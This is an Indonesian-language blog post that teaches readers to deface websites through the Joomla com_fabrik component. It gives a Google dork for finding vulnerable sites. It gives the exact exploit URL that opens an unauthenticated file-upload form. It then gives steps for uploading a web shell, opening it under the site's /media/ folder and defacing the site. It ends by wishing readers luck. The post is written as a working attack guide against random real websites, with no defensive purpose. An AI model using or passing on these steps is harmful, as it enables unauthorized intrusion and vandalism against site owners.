Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut.
Tutornya :
1. Ketik dork berikut ke google :
inurl:index.php?option=com_fabrik
NB : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing
2. Akan ada banyak web. Anda buka terserah yang mana anda mau. Tapi ingat, ngga semua website bisa dideface.
3. Setelah dibuka. Masukkan exploit ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain dan jika berhasil akan muncul form upload seperti ini :
5. Klik "Choose File" trus masukan shell kamu, dan langsung klik "Import CSV" untuk mengupload
6. Jika sudah, buka shell anda dengan format www.site.com/media/namashellkamu.html
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba :)
No comments:
Post a Comment
Jika masih bingung atau apa dengan artikel ini, bisa langsung comment di bawah ini :)